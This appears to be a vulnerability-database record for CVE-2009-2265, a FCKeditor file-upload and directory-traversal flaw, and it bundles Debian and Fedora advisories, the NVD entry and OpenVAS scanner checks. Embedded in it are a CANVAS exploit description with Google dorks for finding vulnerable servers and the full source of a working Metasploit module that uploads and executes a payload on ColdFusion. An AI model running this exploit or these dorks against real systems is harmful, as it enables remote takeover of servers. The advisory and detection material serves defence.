{"id": "SECURITYVULNS:DOC:22182", "bulletinFamily": "software", "title": "[SECURITY] [DSA 1836-1] New fckeditor packages fix arbitrary code execution", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1836-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nJuly 16, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : fckeditor\r\nVulnerability : missing input sanitising\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2009-2265\r\n\r\nVinny Guido discovered that multiple input sanitising vulnerabilities\r\nin Fckeditor, a rich text web editor component, may lead to the\r\nexecution of arbitrary code.\r\n\r\nThe old stable distribution (etch) doesn't contain fckeditor.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 1:2.6.2-1lenny1.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1:2.6.4.1-1.\r\n\r\nWe recommend that you upgrade your fckeditor package.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2.orig.tar.gz\r\n Size/MD5 checksum: 934845 8b58da54703e47622e07b8fdc9f5f93d\r\n http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1.diff.gz\r\n Size/MD5 checksum: 25408 2e10c633f28bdffa1afda0918783ac9e\r\n http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1.dsc\r\n Size/MD5 checksum: 1028 489da6d230d86e6347c2f5839ffd0af3\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1_all.deb\r\n Size/MD5 checksum: 945672 5a0d59f390945ab2df02c43be8e81a5c\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkpfaV4ACgkQXm3vHE4uyloLvwCgkzaouu6V8TbisSreuf6VCuWF\r\n6pUAoNEqmfVDU0LffLY8hdh7NIHGzYvK\r\n=WDKk\r\n-----END PGP SIGNATURE-----", "published": "2009-07-18T00:00:00", "modified": "2009-07-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22182", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2009-2265"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:31", "edition": 1, "viewCount": 20, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2018-08-31T11:10:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2265"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310861868", "OPENVAS:64414", "OPENVAS:861868", "OPENVAS:136141256231064424", "OPENVAS:64424", "OPENVAS:862153", "OPENVAS:861696", "OPENVAS:136141256231064414", "OPENVAS:1361412562310862153", "OPENVAS:1361412562310861696"]}, {"type": "debian", "idList": ["DEBIAN:DC17CA99CEBADBE888FA6D49CFAAFB13:D24D8", "DEBIAN:DSA-1836-1:2FE56"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22121", "SECURITYVULNS:VULN:10034"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1836.NASL", "FEDORA_2009-7794.NASL", "FEDORA_2009-7761.NASL", "COLDFUSION_FCKEDITOR_FILE_UPLOAD.NASL", "FCKEDITOR_CURRENTFOLDER_FILE_UPLOAD.NASL", "FEDORA_2010-6012.NASL"]}, {"type": "canvas", "idList": ["FCKEDITOR"]}, {"type": "exploitdb", "idList": ["EDB-ID:16788"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/COLDFUSION_FCKEDITOR"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95446"]}, {"type": "seebug", "idList": ["SSV:11759"]}], "modified": "2018-08-31T11:10:31", "rev": 2}, "vulnersScore": 7.8}, "affectedSoftware": []}

{"cve": [{"lastseen": "2021-02-02T05:40:03", "description": "Multiple directory traversal vulnerabilities in FCKeditor before 2.6.4.1 allow remote attackers to create executable files in arbitrary directories via directory traversal sequences in the input to unspecified connector modules, as exploited in the wild for remote code execution in July 2009, related to the file browser and the editor/filemanager/connectors/ directory.", "edition": 6, "cvss3": {}, "published": "2009-07-05T16:30:00", "title": "CVE-2009-2265", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2265"], "modified": "2018-10-10T19:39:00", "cpe": ["cpe:/a:fckeditor:fckeditor:2.5", "cpe:/a:fckeditor:fckeditor:2.1.1", "cpe:/a:fckeditor:fckeditor:2.0_rc2", "cpe:/a:fckeditor:fckeditor:2.6.1", "cpe:/a:fckeditor:fckeditor:2.3.1", "cpe:/a:fckeditor:fckeditor:2.2", "cpe:/a:fckeditor:fckeditor:2.0", "cpe:/a:fckeditor:fckeditor:2.6", "cpe:/a:fckeditor:fckeditor:2.0rc3", "cpe:/a:fckeditor:fckeditor:2.3", "cpe:/a:fckeditor:fckeditor:2.6.2", "cpe:/a:fckeditor:fckeditor:2.0_fc", "cpe:/a:fckeditor:fckeditor:2.4.2", "cpe:/a:fckeditor:fckeditor:2.5.1", "cpe:/a:fckeditor:fckeditor:2.6.4", "cpe:/a:fckeditor:fckeditor:2.4", "cpe:/a:fckeditor:fckeditor:2.0rc2", "cpe:/a:fckeditor:fckeditor:2.4.1", "cpe:/a:fckeditor:fckeditor:2.3.3", "cpe:/a:fckeditor:fckeditor:2.1", "cpe:/a:fckeditor:fckeditor:2.3.2", "cpe:/a:fckeditor:fckeditor:2.4.3", "cpe:/a:fckeditor:fckeditor:2.6.3"], "id": "CVE-2009-2265", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fckeditor:fckeditor:2.5:beta:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.6.3:beta:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.6.4:beta:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.0_fc:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.0rc3:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.0_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.3:beta:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.0rc2:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:fckeditor:fckeditor:2.3:*:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2019-05-29T17:19:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2265"], "edition": 2, "description": "**Name**| FCKEditor \n---|--- \n**CVE**| CVE-2009-2265 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| FCKEditor \n**Notes**| CVE Name: CVE-2009-2265 \nVENDOR: \nKnown Vunlerable Versions: ['ColdFusion MX 8 - 8.01', 'osCMax &lt;=2.0', 'RunCMS &lt;=1.3a', 'Falt4 CMS', 'Many more to come!'] \nNotes: This exploit has two different variants - one for Windows on ColdFusion and another for Apache. The Default will get you a shell on ColdFusion MX 8.0 and MX 8.0.1. \n \nColdFusion/IIS: To exploit this successfully you have to win a race condition - this exploit module dramatically increases your odds of getting a shell (in fact it doesn't stop until it does or you stop it). Due to the nature of the exploit you may get more than 1 shell to appear (because we can win the race again before the module \nhas a chance to stop trying). We first send a ColdFusion module up to the server that, when executed, will dump a MOSDEF trojan onto the webserver in the format of CFAdminYYZZ.exe. \n \nThis MOSDEF shell will be running as user SYSTEM. The default behavior of this exploit is to attack ColdFusion on IIS. \n \nApache: There are many applications that use FCKEditor and the attack vector varies as a result. This module attempts a combination of many known attack vectors but can be 'noisy' \n \nIn the 'autoversion' mode it will attempt to find vulnerable installations of a few known applications that are known to be vulnerable. \nIn the 'custom' mode you can supply a path to your own connector believed to be vulnerable and CANVAS will attempt a variety of combinations \nto get a shell uploaded and executed. \n \nBe mindful to supply the correct basepath so CANVAS can build the URLs correctly! \n \nDue to the race condition the generated CFAdminYYZZ.cfm file may not be deleted from the /UserFiles/File folder. You may have to do this manually \nRepeatability: Infinite \nReferences: ['http://www.adobe.com/support/security/bulletins/apsb09-09.html (ColdFusion)'] \nDate public: 7/8/2009 \nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265 \nGoogle Dorks: ['inurl:cfm/cf5_connector.cfm', 'inurl:cfm/cf5_upload.cfm', 'inurl:php/connector.php'] \nCVSS: 7.5 \n\n", "modified": "2009-07-05T16:30:00", "published": "2009-07-05T16:30:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/FCKEditor", "id": "FCKEDITOR", "type": "canvas", "title": "Immunity Canvas: FCKEDITOR", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:24", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2265"], "description": "Jan Wagner uploaded new packages for egroupware which fixed the\nfollowing security problems:\n\nCVE-2009-2265\n\n Multiple directory traversal vulnerabilities in FCKeditor before\n 2.6.4.1 allow remote attackers to create executable files in arbitrary\n directories via directory traversal sequences in the input to\n unspecified connector modules, as exploited in the wild for remote\n code execution in July 2009, related to the file browser and the\n editor/filemanager/connectors/ directory.\n\nFor the lenny-backports distribution the problems have been fixed in\nversion 1.6.002+dfsg-1~bpo50+1.\n\nFor the sid distributions the problems have been fixed in version\n1.6.002+dfsg-1.\n\n\nUpgrade instructions\n--------------------\n\nIf you don&#x27;t use pinning (see [1]) you have to update the packages\nmanually via &quot;apt-get -t lenny-backports install &lt;packagelist&gt;&quot; with the\npackagelist of your installed packages affected by this update.\n[1] &lt;http://backports.org/dokuwiki/doku.php?id=instructions&gt;\n\nWe recommend to pin the backports repository to 200 so that new versions\nof installed backports will be installed automatically:\n\n Package: *\n Pin: release a=lenny-backports\n Pin-Priority: 200\n", "edition": 2, "modified": "2009-08-04T18:52:05", "published": "2009-08-04T18:52:05", "id": "DEBIAN:DC17CA99CEBADBE888FA6D49CFAAFB13:D24D8", "href": "https://lists.debian.org/debian-backports-announce/2009/debian-backports-announce-200908/msg00001.html", "title": "[Backports-security-announce] Security Update for egroupware", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:30", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2265"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1836-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 16, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : fckeditor\nVulnerability : missing input sanitising\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-2265\n\nVinny Guido discovered that multiple input sanitising vulnerabilities\nin Fckeditor, a rich text web editor component, may lead to the\nexecution of arbitrary code.\n\nThe old stable distribution (etch) doesn&#x27;t contain fckeditor.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1:2.6.2-1lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.4.1-1.\n\nWe recommend that you upgrade your fckeditor package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2.orig.tar.gz\n Size/MD5 checksum: 934845 8b58da54703e47622e07b8fdc9f5f93d\n http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1.diff.gz\n Size/MD5 checksum: 25408 2e10c633f28bdffa1afda0918783ac9e\n http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1.dsc\n Size/MD5 checksum: 1028 489da6d230d86e6347c2f5839ffd0af3\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1_all.deb\n Size/MD5 checksum: 945672 5a0d59f390945ab2df02c43be8e81a5c\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 2, "modified": "2009-07-16T17:56:04", "published": "2009-07-16T17:56:04", "id": "DEBIAN:DSA-1836-1:2FE56", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00150.html", "title": "[SECURITY] [DSA 1836-1] New fckeditor packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:12", "description": "", "published": "2010-11-03T00:00:00", "type": "packetstorm", "title": "ColdFusion 8.0.1 Arbitrary File Upload And Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2265"], "modified": "2010-11-03T00:00:00", "id": "PACKETSTORM:95446", "href": "https://packetstormsecurity.com/files/95446/ColdFusion-8.0.1-Arbitrary-File-Upload-And-Execute.html", "sourceData": "`## \n# $Id: coldfusion_fckeditor.rb 10874 2010-11-02 23:51:17Z mc $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute.', \n'Description' => %q{ \nThis module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload \nand Execute vulnerability. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 10874 $', \n'Platform' => 'win', \n'Privileged' => true, \n'References' => \n[ \n[ 'CVE', '2009-2265' ], \n], \n'Targets' => \n[ \n[ 'Universal Windows Target', \n{ \n'Arch' => ARCH_JAVA, \n'Payload' => \n{ \n'DisableNops' => true, \n}, \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jul 3 2009' \n)) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]), \n], self.class ) \nend \n \ndef exploit \n \npage = rand_text_alpha_upper(rand(10) + 1) + \".jsp\" \n \ndbl = Rex::MIME::Message.new \ndbl.add_part(payload.encoded, \"application/x-java-archive\", nil, \"form-data; name=\\\"newfile\\\"; filename=\\\"#{rand_text_alpha_upper(8)}.txt\\\"\") \nfile = dbl.to_s \nfile.strip! \n \nprint_status(\"Sending our POST request...\") \n \nres = send_request_cgi( \n{ \n'uri' => \"#{datastore['FCKEDITOR_DIR']}\", \n'query' => \"Command=FileUpload&Type=File&CurrentFolder=/#{page}%00\", \n'version' => '1.1', \n'method' => 'POST', \n'ctype' => 'multipart/form-data; boundary=' + dbl.bound, \n'data' => file, \n}, 5) \n \nif ( res and res.code == 200 and res.body =~ /OnUploadCompleted/ ) \nprint_status(\"Upload succeeded! Executing payload...\") \n \nsend_request_raw( \n{ \n# default path in Adobe ColdFusion 8.0.1. \n'uri' => '/userfiles/file/' + page, \n'method' => 'GET', \n}, 5) \n \nhandler \nelse \nprint_error(\"Upload Failed...\") \nreturn \nend \n \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/95446/coldfusion_fckeditor.rb.txt"}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2265"], "description": "MoinMoin is an advanced, easy to use and extensible WikiEngine with a large community of users. Said in a few words, it is about collaboration on easily editable web pages. ", "modified": "2009-07-19T10:36:56", "published": "2009-07-19T10:36:56", "id": "FEDORA:989BE10F8B4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: moin-1.8.4-2.fc11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2265"], "description": "MoinMoin is an advanced, easy to use and extensible WikiEngine with a large community of users. Said in a few words, it is about collaboration on easily editable web pages. ", "modified": "2010-02-20T00:15:56", "published": "2010-02-20T00:15:56", "id": "FEDORA:8383E10FCDA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: moin-1.8.7-1.fc11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2265", "CVE-2010-0828"], "description": "MoinMoin is an advanced, easy to use and extensible WikiEngine with a large community of users. Said in a few words, it is about collaboration on easily editable web pages. ", "modified": "2010-06-14T17:22:06", "published": "2010-06-14T17:22:06", "id": "FEDORA:7084D111AD7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: moin-1.8.8-1.fc11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2265", "CVE-2010-0828"], "description": "MoinMoin is an advanced, easy to use and extensible WikiEngine with a large community of users. Said in a few words, it is about collaboration on easily editable web pages. ", "modified": "2010-04-09T01:25:29", "published": "2010-04-09T01:25:29", "id": "FEDORA:1CAD6110661", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: moin-1.8.7-2.fc11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0781", "CVE-2008-3381", "CVE-2009-0260", "CVE-2009-0312", "CVE-2009-2265"], "description": "MoinMoin is an advanced, easy to use and extensible WikiEngine with a large community of users. Said in a few words, it is about collaboration on easily editable web pages. ", "modified": "2009-07-19T10:23:43", "published": "2009-07-19T10:23:43", "id": "FEDORA:AF99210F89B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: moin-1.6.4-3.fc10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2018-01-02T10:54:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "description": "Check for the Version of moin", "modified": "2017-12-25T00:00:00", "published": "2010-03-02T00:00:00", "id": "OPENVAS:861696", "href": "http://plugins.openvas.org/nasl.php?oid=861696", "type": "openvas", "title": "Fedora Update for moin FEDORA-2010-1743", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2010-1743\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"moin on Fedora 11\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035374.html\");\n script_id(861696);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-1743\");\n script_cve_id(\"CVE-2009-2265\");\n script_name(\"Fedora Update for moin FEDORA-2010-1743\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.8.7~1.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "description": "The remote host is missing an update to fckeditor\nannounced via advisory DSA 1836-1.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064424", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064424", "type": "openvas", "title": "Debian Security Advisory DSA 1836-1 (fckeditor)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1836_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1836-1 (fckeditor)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Vinny Guido discovered that multiple input sanitising vulnerabilities\nin Fckeditor, a rich text web editor component, may lead to the\nexecution of arbitrary code.\n\nThe old stable distribution (etch) doesn't contain fckeditor.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1:2.6.2-1lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.4.1-1.\n\nWe recommend that you upgrade your fckeditor package.\";\ntag_summary = \"The remote host is missing an update to fckeditor\nannounced via advisory DSA 1836-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201836-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64424\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2265\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1836-1 (fckeditor)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"2.6.2-1lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": 